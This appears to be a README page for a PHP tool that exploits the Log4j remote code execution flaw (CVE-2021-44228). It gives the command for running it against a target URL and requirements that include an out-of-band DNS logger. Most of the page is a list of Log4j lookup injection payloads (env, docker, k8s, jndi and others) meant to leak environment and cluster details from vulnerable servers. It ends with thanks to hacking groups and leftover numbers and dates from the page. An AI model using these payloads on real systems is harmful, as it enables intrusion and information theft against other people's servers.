Log4j-RCE
Log4j RCE - (CVE-2021-44228) 
How To Run?
php log4j.php https://1337.com
Requirements
- PHP CURL
- PAYLOAD
- DNS LOG (Collaborator Burpsuite or use dnslog.cn)
List Payload
${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}
${java:runtime}
${java:vm}
${java:os}
${jndi:logging/context-name}
${hostName}
${docker:containerId}
${k8s:accountName}
${k8s:clusterName}
${k8s:containerId}
${k8s:containerName}
${k8s:host}
${k8s:labels.app}
${k8s:labels.podTemplateHash}
${k8s:masterUrl}
${k8s:namespaceId}
${k8s:namespaceName}
${k8s:podId}
${k8s:podIp}
${k8s:podName}
${k8s:imageId}
${k8s:imageName}
${log4j:configLocation}
${log4j:configParentLocation}
${spring:spring.application.name}
${main:myString}
${main:0}
${main:1}
${main:2}
${main:3}
${main:4}
${main:bar}
${name}
${marker}
${marker:name}
${spring:profiles.active[0]
${sys:logPath}
${web:rootDir}
Special Thanks
- Hidden Ghost Team
- IndoSec
- IndoXploit
2 Jun 25, 2022
2 May 15, 2022
12 Oct 4, 2022
3 Jul 7, 2022
24 Oct 13, 2022
25 Nov 22, 2022
12 Nov 4, 2022
10 Nov 3, 2022
0 Jan 27, 2022
11 Jun 10, 2021
7 Jul 11, 2022
7 Dec 9, 2022
2 Sep 27, 2021
0 Dec 25, 2021
4 Oct 21, 2022
51 Nov 6, 2022
2 Nov 14, 2021
9 Nov 16, 2021
5 Sep 30, 2022
25 Nov 22, 2022
12 Nov 4, 2022
7 Jul 11, 2022
2 Sep 27, 2021
9 Nov 16, 2021
5 Sep 30, 2022
0 Sep 20, 2022
3 Dec 3, 2021
1 Dec 1, 2022
0 Jun 15, 2022